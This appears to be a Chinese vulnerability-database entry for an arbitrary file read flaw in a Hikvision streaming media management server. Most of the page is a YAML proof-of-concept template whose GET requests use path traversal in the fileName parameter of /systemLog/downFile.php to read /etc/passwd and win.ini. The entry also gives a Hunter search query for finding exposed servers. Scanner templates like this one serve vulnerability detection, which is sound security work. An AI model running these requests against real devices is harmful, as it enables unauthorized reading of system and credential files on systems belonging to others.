hikvision-downfle-fileread: 海康威视流媒体管理服务器后台任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 海康威视流媒体管理服务器 | POC: 已公开

漏洞描述

Hunter: web.title="流媒体管理服务器"

PoC代码[已公开]

id: hikvision-downfle-fileread

info:
  name: 海康威视流媒体管理服务器后台任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Hunter: web.title="流媒体管理服务器"
  reference:
    - https://mp.weixin.qq.com/s/khra2Z6U57kktxGooUEu-A
  tags: hikvision,fileread
  created: 2024/01/06

rules:
  r0:
    request:
      method: GET
      path: /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b'bit app support')
  r1:
    request:
      method: GET
      path: /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()

相关漏洞推荐